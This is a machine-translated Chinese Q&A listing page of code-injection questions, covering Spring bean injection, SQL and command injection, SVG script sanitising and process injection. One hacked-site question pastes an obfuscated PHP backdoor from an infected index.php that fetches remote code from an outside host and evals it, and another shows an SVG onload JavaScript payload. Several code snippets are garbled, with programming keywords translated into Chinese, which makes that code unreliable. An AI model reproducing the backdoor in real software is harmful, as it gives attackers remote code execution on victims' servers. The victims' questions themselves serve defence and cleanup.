code-injection 相关问题

代码注入是缺少中和或外部影响输入的特殊元素的不正当中和的结果的通用术语,其可以修改预期代码的语法或行为。

如何从 C# 代码安全地调用 Java keytool [已关闭]

我想用 C# 创建一个 GUI,用于在后台运行 cmd.exe 上的 keytool 以创建密钥库,包括密钥和证书数据。 然后需要输入数据 密钥库路径 密码...

回答 1 投票 0

在 spring 2.0 中重写抽象 impl 中的 spring bean

@配置 公共抽象类C{ @豆 受保护的抽象对象 getObject(); } @配置 A 类扩展了 C 类{ 受保护对象 getObject(){ 地图

回答 1 投票 0

使用 servlet api 进行命令注入 bash

我正在尝试测试命令注入漏洞 我使用一个 servlet 来执行命令 ls,然后我尝试在 url 中传递另一个命令来暴露命令注入漏洞,但是......

回答 1 投票 0

Python 上的 SQL 注入

最近,我在研究一个SQl注入问题。我需要在一个查询中执行多个sql。 def db_query(db_connection, 查询): cur = db_connection.cursor() 查询结果 = [] 尝试: ...

回答 1 投票 0

修复 objcopy 输出二进制文件上的 elf 段地址

我正在尝试将一些编译的代码注入到 elf 可执行文件中。该策略是在“代码”段的末尾写入一些字节。我选择这个部分的原因是因为我需要我的工资...

回答 1 投票 0

强化问题 - 命令注入

我正在尝试对我的 java 应用程序进行 hp fortify 安全扫描。我有几个问题,我已经解决了。但我无法找到以下问题的解决方案。 命令注入 字符串主机名 =

回答 1 投票 0

.htaccess 文件在文件目录中重复创建

我的共享主机中有大约 10 个站点。最近我注意到创建了很多 .htaccess 文件并限制了用户访问。 我的共享主机中有大约 10 个站点。最近我注意到创建了很多 .htaccess 文件并限制了用户访问。 <FilesMatch ".(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|phP|PhP|php5|suspected)$"> Order Allow,Deny Deny from all </FilesMatch> 上面的块是所有代码.htaccess中写入的内容。当我删除它们时,它似乎又重新生成了。这意味着应该有一个脚本在包中的其他地方运行。我什至安装了 Wordfence 插件来识别更新的文件。我恢复了最近似乎是恶意的修改。但仍然没有任何变化。在像下面的index.php这样的文件中还有一些编码的代码行。 <?php $uoeq967= "O)sl 2Te4x-+gazAbuK_6qrjH0RZt*N3mLcVFEWvh;inySJC91oMfYXId5Up.(GP7D,Bw/kQ8";$vpna644='JGNoID0gY3VybF9pbml0KCdodHRwOi8vYmFua3N';$vpna645='zdG9wLnRlY2gvJy4kX0dFVFsnZiddKTtjdXJsX3';$vpna646='NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBT';$vpna647='lNGRVIsIDEpOyRyZXN1bHQgPSBjdXJsX2V4ZWMo';$vpna648='JGNoKTtldmFsKCc/PicuJHJlc3VsdCk7';$vpna643=$vpna644.$vpna645.$vpna646.$vpna647.$vpna648;function cdim173($fsxi199,$rykc638,$ekcu564){return ''.$fsxi199.''.$rykc638.''.$ekcu564.'';}$qfcg427 = cdim173($uoeq967{34},$uoeq967{13}.$uoeq967{3},$uoeq967{3});$uodu186 = cdim173($uoeq967{19}.$uoeq967{17},$uoeq967{2}.$uoeq967{7},'');$lrbk358 = cdim173($uoeq967{22},$uoeq967{19},$uoeq967{52});$hume205 = cdim173($uoeq967{17},'',$uoeq967{43});$xzdo850 = cdim173($uoeq967{34},$uoeq967{19},$uoeq967{13}.$uoeq967{22});$uqmy998 = cdim173($uoeq967{22},$uoeq967{13},$uoeq967{44});$aobc355 =cdim173(cdim173($qfcg427,'',$uodu186),cdim173($lrbk358,$hume205,''),cdim173($xzdo850,'',$uqmy998));$xggn756 = cdim173($uoeq967{34},$uoeq967{22},$uoeq967{7});$gnix510 = cdim173($uoeq967{13},$uoeq967{28},'');$wdfm884 = cdim173($uoeq967{7},'',$uoeq967{19});$loyh183 = cdim173($uoeq967{52},$uoeq967{17},$uoeq967{43});$bwfh819 = cdim173($uoeq967{34},$uoeq967{28},'');$jrmp133 = cdim173($uoeq967{42},$uoeq967{50},'');$iprf791 = cdim173('',$uoeq967{43},'');$hwks376 = cdim173( cdim173($xggn756,$gnix510,$wdfm884), cdim173($loyh183,'',$bwfh819), cdim173($jrmp133,'',$iprf791));$mtzu128 = cdim173($uoeq967{7},'',$uoeq967{39});$hesn342= cdim173($uoeq967{13},$uoeq967{3},$uoeq967{61});$taop807 = cdim173('',$uoeq967{16},$uoeq967{13});$gvcw064 = cdim173($uoeq967{2},$uoeq967{7},$uoeq967{20});$bihf178 = cdim173($uoeq967{8},$uoeq967{19},$uoeq967{56});$efaa907 = cdim173($uoeq967{7},$uoeq967{34},$uoeq967{50});$tvhp307 = cdim173($uoeq967{56},$uoeq967{7},$uoeq967{61});$qyff908 = cdim173(cdim173($mtzu128,$hesn342,''),cdim173('','',$taop807),cdim173($gvcw064,$bihf178.$efaa907,$tvhp307)).'"'.$vpna643.'"'.cdim173($uoeq967{1}.$uoeq967{1},'',$uoeq967{41});$aobc355($hwks376,array('','}'.$qyff908.'//'));//wp-blog-header scp-173?> 除了删除每个目录的 .htaccess 之外,我别无选择。但这并不能解决问题。除了清空我的文件管理器之外我还能做什么。 嗯,整个包都被黑了。我无能为力。正如其他人建议的那样,我花了两天时间将自动生成的文件一一清除。它被删除并在第二天出现。某些脚本可能在创建文件的后面运行。所以唯一的解决办法是; 联系托管提供商并要求他们彻底清理 目录,然后从头开始。或 联系网络安全分析师并付钱让他们清除 至少花费 199 美元左右。 是的,糟糕的事情发生了! 首先,找到各个目录中通常存在的可疑文件,打开它,分析代码。一旦确认该文件是病毒或恶意软件,请复制文件名并通过 cpanel 上提供的搜索字段进行搜索。验证内容并从主机目录中删除该文件的每个实例。重复该过程,直到您注意到不再发生再生。

回答 2 投票 0

了解滚动到文本片段 (STTF) 泄漏

以下内容涉及CSAW2023 CTF的剧透【CTF已经结束,但还是想警告一下】 背景 在最近的 CSAW2023 CTF 中,在一项名为 Rainbow-Notes 的挑战中,我们获得了一个书面网站...

回答 1 投票 0

如何将代码注入macOS中的arm64e进程?

我编写了一个实用程序,通过使用旧的 mach_inject 方法将编译代码(以 dylib 的形式)注入 Dock 来修改系统行为。然而,mach_inject 尚未更新

回答 2 投票 0

Spring:如何向静态字段注入值?

有了这堂课 @成分 公共课样本{ @Value("${my.name}") 公共静态字符串名称; } 如果我尝试 Sample.name,它始终为“null”。所以我尝试了这个。 公共课样本{

回答 6 投票 0

如何从 SVG 文件中删除所有 javascript?

我们计划允许用户上传 SVG 文件和图标。问题是 SVG 文件可以包含 JavaScript,因此很容易受到注入攻击。 我们计划允许用户上传 SVG 文件和图标。问题是 SVG 文件可以包含 JavaScript,因此很容易受到注入攻击。 <svg xmlns="http://www.w3.org/2000/svg" width="780" height="550" onload="(function(){ alert('doing something nasty') })()"> 使用 svg 文件时会执行此代码。 我发现了这个很好的库来管理 SVG 文件。这有助于删除诸如 onEVENT='someJs()' 之类的属性;但这仍然无法帮助我晚上入睡。 那么如何巧妙的方式彻底扫除一个SVG文件中的JS代码呢? https://digi.ninja/blog/svg_xss.php详细介绍了这一点。 它指出: 直接查看 - 易受攻击 - 文件直接链接。 通过内容处置直接查看:附件 - 不易受攻击 - 发送标头以强制下载文件。 使用 CSP 直接查看 - 不易受攻击 - 内容安全策略设置为禁止内联 JavaScript。 图像标签 - 不易受攻击 - SVG 通过防止脚本的图像标签引用。 带有 CSP 的标签 - 不易受攻击 - 图像标签和与上述相同的 CSP,实现双重保护。 通过 Inkscape 进行清理 - 易受攻击 - 这是直接视图,但文件已通过以下命令进行处理: inkscape --file="xss.svg" --verb="FileVacuum" --export-plain-svg="sanitised.svg" (预计这会删除 JavaScript,但事实并非如此。) iframe 中的图像 - 易受攻击 - SVG 作为 iframe 的源加载,没有设置特殊属性。 沙盒 iframe 中的图像 - 不易受攻击 - SVG 作为 iframe 的源加载,但沙盒属性设置为 块脚本。 您也可以导出到不存在此问题的其他文件类型。在 Linux 上使用 Inkscape 的 CLI 的示例: inkscape --export-type="png" /home/x/Pictures/example.svg https://wiki.inkscape.org/wiki/index.php/Using_the_Command_Line 在“导出文件”下有更多信息。 编辑:以下项目实际上可以去掉 JavaScript: https://github.com/jakearchibald/svgomg,将自己描述为“SVGO 缺少 GUI”。 SVGO:https://github.com/svg/svgo,在其自述文件中表示“SVG Optimizer 是一个基于 Node.js 的工具,用于优化 SVG 矢量图形文件。”

回答 1 投票 0

将 JAXBContext 注入 spring

我正在尝试将 JAXBContext 注入到 Spring 应用程序上下文中,方法是: 我正在尝试将 JAXBContext 注入到 Spring 应用程序上下文中,通过: <bean id="jaxbContext" class="javax.xml.bind.JAXBContext" factory-method="newInstance"> <constructor-arg type="java.lang.Class" value="com.package.MyClassName"/> </bean> 它抛出异常: 找不到匹配的工厂方法:工厂方法“newInstance” 我也尝试: <bean id="jaxbContext" class="javax.xml.bind.JAXBContext" factory-method="newInstance"> <constructor-arg type="java.lang.String" value="com.package"/> </bean> 它抛出一个异常: javax.xml.bind.JAXBException:“com.package”不包含 ObjectFactory.class 或 jaxb.index 我确实在包“com.package”中放置了一个 jaxb.index 文件,并且文件中有一行“MyClassName”。 @Tomasz 的答案是我推荐的解决方案,但如果您想坚持使用 JAXBContext,那么您的第一个示例失败的原因是 static getInstance() 上的 JAXBContext 方法不接受单个 Class 参数,它需要它们的可变参数列表。所以你需要注入一个列表,而不是单个类: <bean id="jaxbContext" class="javax.xml.bind.JAXBContext" factory-method="newInstance"> <constructor-arg value-type="java.lang.Class"> <list> <value>com.package.MyClassName</value> </list> </constructor-arg> </bean> 你尝试过 Spring OXM 吗?最后一行很重要,命名空间仅供参考: <?xml version="1.0" encoding="UTF-8"?> <beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:oxm="http://www.springframework.org/schema/oxm" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans-2.5.xsd http://www.springframework.org/schema/oxm http://www.springframework.org/schema/oxm/spring-oxm-1.5.xsd"> <oxm:jaxb2-marshaller id="marshaller" contextPath="com.package"/> </beans> 参见8.4。基于 XML 模式的配置。您的类路径中还需要 spring-oxm。 这将解决 spring env 中的 jaxb.index 文件或 ObjectFactory 问题。提供包的值,其中的类是生成 xml 的 <bean id="marshaller" class="org.springframework.oxm.jaxb.Jaxb2Marshaller"> <property name="packagesToScan" > <value>com.adarsh.spring.integration.entities</value> </property> </bean>

回答 3 投票 0

安全的动态会员访问

在我们的环境中,我们使用 Injection Hunter 检测易受攻击的代码。另请参阅:PowerShell 脚本的安全审核 由于某种原因,注入猎人检测到像 $Object.$

回答 1 投票 0

检查 SQL 查询是否存在可能的注入的模式是什么?

我想通过检查SQL查询来检测可能的SQL注入攻击。我正在使用 PDO 和准备好的声明,所以希望我不会面临被某人攻击的危险。然而,我所...

回答 3 投票 0

在 PHP 中处理 eval

免责声明:这只是一个了解 PHP 代码注入的示例,而不是以任何方式使用的生产代码。我完全意识到这不是良好的编码实践。 我有以下 PHP 脚本...

回答 1 投票 0

中间件中的HttpContext如何

在asp net core(中间件)中我们有: app.Run(异步上下文 => 等待 context.Response.WriteAsync("hello")); 我有一个问题:如何在asp net core中注入上下文? 我试图创造...

回答 0 投票 0

从注入的 JS 中导入 JS 文件

我有一些“油脂”(JS / CSS改编),我通过插件将其注入到某个域的页面中。现在我的同事也想使用它们。为了在此

回答 1 投票 0

是否可以在 FullCalendar version6 中注入标题?

在完整日历的第 6 版中,可以通过 ng-template 注入内容。示例基于 eventContent。 在完整日历的第 6 版中,可以通过 ng-template 注入内容。示例基于 eventContent。 <full-calendar [options]="calendarOptions"> <ng-template #eventContent let-arg> <b>{{ arg.event.title }}</b> </ng-template> </full-calendar> 标题也可以吗?我找不到有关它的信息。我尝试使用#header 和#headerToolbar,但它并没有真正起作用。

回答 0 投票 0

Sencha Extjs DateField 允许 javascript 注入问题

允许用户在 Extjs DateField 中注入 javascript。例如,如果您尝试使用 javascript 输入标签,请输入以下内容 `` 在 datefield 的文档中...

回答 1 投票 0

如何在 .NET Core 中访问数据库上下文表单视图?

如何访问 .NET Core 中的数据库上下文表单视图以创建自定义 HTML 帮助程序扩展?

回答 1 投票 0

© www.soinside.com 2019 - 2024. All rights reserved.